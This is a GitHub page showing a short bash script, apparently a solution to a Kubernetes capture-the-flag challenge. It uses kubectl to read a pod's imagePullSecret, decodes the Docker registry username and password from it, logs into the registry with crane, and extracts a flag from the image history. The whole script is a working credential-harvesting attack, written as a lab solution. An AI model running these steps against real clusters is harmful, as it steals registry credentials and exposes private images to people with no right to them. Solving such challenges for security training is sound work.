-
Notifications
You must be signed in to change notification settings - Fork 0
/
challenge_2
25 lines (18 loc) · 1.16 KB
/
challenge_2
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#!/bin/bash
# Decode JWT function so we can stay programmatic and in the browser
function jwt-decode() {
sed 's/\./\n/g' <<< $(cut -d. -f1,2 <<< $1) | base64 --decode | jq
}
# We get the imagePullSecret name so that we can look up that secret. It kicks us back a JWT in the '.dockerconfigjson' key
export JWT=$(kubectl get secrets $(kubectl get pods -o json | jq -r '.items[0].spec.imagePullSecrets[0].name') -o json | jq -r '.data.".dockerconfigjson"')
export BEARER=$(jwt-decode $JWT | jq -r '.auths."index.docker.io/v1/".auth' | base64 -d)
# Parsing the bearer formatted token from the JWT
export USERNAME=$(echo $BEARER | cut -d : -f 1)
export PASSWORD=$(echo $BEARER | cut -d : -f 2)
# Hack to get the registry dynamically and image
export REGISTRY=$(kubectl get pods -o json | jq -r '.items[0].status.containerStatuses[0].image' | cut -d '/' -f 1)
export IMAGE=$(kubectl get pods -o json | jq -r '.items[0].spec.containers[0].image')
# Authenticating into Crane
crane auth login $REGISTRY --username $USERNAME --password $PASSWORD
# Hack to pull out the flag from the image layer
crane config $IMAGE | jq -r '.history[2].created_by' | cut -d "'" -f 2 | cut -d "'" -f 1